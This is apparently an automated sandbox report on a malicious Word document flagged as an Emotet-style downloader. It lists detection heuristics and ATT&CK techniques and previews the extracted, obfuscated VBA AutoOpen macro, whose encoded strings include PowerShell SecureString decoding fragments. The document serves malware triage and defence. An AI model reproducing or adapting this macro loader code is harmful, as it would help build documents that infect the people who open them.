MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing a VBA macro, specifically an AutoOpen macro, which is a common technique for initial execution. The macro is designed to download and execute a second-stage payload, as indicated by the 'CreateObject' call and the ClamAV detection signature 'Doc.Malware.Emodldr'. The presence of the 'macros.bas' file further supports this. The macro's obfuscated nature and lack of specific URL or command execution details prevent a more precise family attribution.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 40974 bytes |
SHA-256: 95219e1e95ae73e4794a503e7e04a2df466b78fc2238b0a01212bec9d1dd4b0b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 19 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "NClwQGowV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "QQfdjilYci"
Function IUuaarQpLJOiiB()
On Error Resume Next
Select Case jKQmvf
Case 51809
Rzhzd = Hex(26125 - CSng(6443) - 84068 + ChrW(NzGvo))
WtBsm = mmjdz
End Select
CfncLFz = PXFdF("4UfcIAMwBkADEAMgA1ADAAZQAyAGEAMQA1ADgANQA3ADMAMAAyAGUANgBkADcAZABjAGIANwBiADUAYwBhADgANwA3ADEAMQAXjH0", 5, 93)
Select Case wNhHZ
Case 70984
JwuNzo = Hex(33023 - CSng(85671) - 26729 + ChrW(ZBjrou))
tmoOiN = VdAHd
End Select
Select Case ZWEdXY
Case 21648
wGIJEh = Hex(97026 - CSng(26391) - 15084 + ChrW(NZlaHT))
CLanw = XIKWV
End Select
VhYvzzNiPzK = PXFdF("I,8BA2ADYAZQBkADYANAAxAGIAZQA1ADAAYQBlADkAYQAxADgAMQA2ADYANQBlADgAZAA3AGYANwA0ADMANwBmADcAOAA2AGMAZAA5AGUAYgA4AGQANQBlAGMANYjK", 5, 119)
Select Case uMbijp
Case 53454
BuMzt = Hex(76280 - CSng(96312) - 89685 + ChrW(OzPlW))
MkLAi = BtLcfM
End Select
Select Case IXXHjB
Case 68930
zkMnC = Hex(27180 - CSng(2370) - 58214 + ChrW(hlYhSw))
LDQGjF = owNiz
End Select
XPXniGOHEa = PXFdF("J5rBAZABkAGIAZgA0ADIANAA5AGEAMAAzAGUAMQBlADEAYgBlAGIAZgBjADMAIuXnq", 5, 57)
Select Case hFWQW
Case 92161
iRFjC = Hex(5457 - CSng(95068) - 47282 + ChrW(sCpbqv))
kdYtjY = pjDTFc
End Select
Select Case kvhLGR
Case 24919
mkFRlY = Hex(90909 - CSng(80404) - 28586 + ChrW(wFojwW))
uUYhT = YsPiF
End Select
fGWazpVWjr = PXFdF("5wNwAyADIAMAAwADcAMgA1ADMAZQBjADcAYgAwADYAOQA3ADEAYgBiADQANABiADUAZABjAGIAMgAyAGIAMwBlADIAYgBlADcANgA0ADIAYQAyADMAZgA4AGQAO5Tpj", 3, 121)
Select Case JGDOLh
Case 93351
lLrlvE = Hex(78444 - CSng(45764) - 67249 + ChrW(DzLpLw))
ESYjZW = qtFYur
End Select
Select Case pYoLW
Case 29885
opNuOn = Hex(81443 - CSng(51260) - 90942 + ChrW(QSfhp))
jouIz = lVnVLz
End Select
dXDFLIz = PXFdF("5dEPJ,114,186,28,235,81,71,74,70,203,169,62,37)) ) )| & ( $SHEllId[1]+$4p", 6, 66)
Select Case hYIjcF
Case 75080
pBThrJ = Hex(8648 - CSng(93713) - 4370 + ChrW(kzOFXb))
wtEsG = bsiOzI
End Select
Select Case MROBr
Case 90466
JLNNG = Hex(86670 - CSng(55108) - 72053 + ChrW(FQtuR))
kCDhrG = iuKoK
End Select
LXWuLMI = PXFdF("busHNADYANwBkADcAYQAzAGYAYQA1AGMAZgAzADcAYwBmAGMAZAA4AGIAZQAzAGYAMwA1AGEAMABkAGQANwAkd", 6, 79)
Select Case ivdrr
Case 85759
OWFzZZ = Hex(22623 - CSng(30278) - 21717 + ChrW(DrnOh))
zJDwo = TCSiUH
End Select
Select Case TojBqK
Case 39895
GKjcu = Hex(77996 - CSng(72535) - 955 + ChrW(iKiKUP))
YNncDq = qOhCI
End Select
RCREIfTU = PXFdF("pgA1AGQAZQA2ADYA' | cOnVerTtO-SECurEstRINg -K 107,78,130,13,65,226,162,247,35,243,236,251jjJu,3q2", 2, 89)
Select Case LQhjv
Case 78499
kkwGz = Hex(71717 - CSng(35294) - 49629 + ChrW(iSzZv))
dWsKQz = NMmdpb
End Select
Select Case UXsjKl
Case 78708
jaVwiN = Hex(49472 - CSng(49344) - 26356 + ChrW(sVfdIV))
fJlmC = HzDzml
End Select
DBLiOH = PXFdF("j13UDUAYgBiADAAYQA5ADgANABlADkAMAA0ADcANAA1ADEAR8FU", 5, 43)
Select Case STdvch
Case 1921
AmWlUI = Hex(50598 - CSng(47781) - 90890 + ChrW(PXUfcD))
hlNAaP = onfYsj
End Select
Select Case nlkwv
Case 81817
FHNTW = Hex(983 - CSng(71641) - 37716 + ChrW(ZlIVv))
FJuwBz = VthPRD
End Select
KuHPU = PXFdF("dP([rUnTime.intEroPSErvicES.marShAl]::([RunTIME.iNTERopSerVICes.marSHal].gETMeMBeRs()[4].nAME).inVOke([RuNTiMe.iNTEropsERVICEs.mARShal]::sEcuReStrINgTo5.b5f", 3, 149)
Select Case inJpaq
Case 94796
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.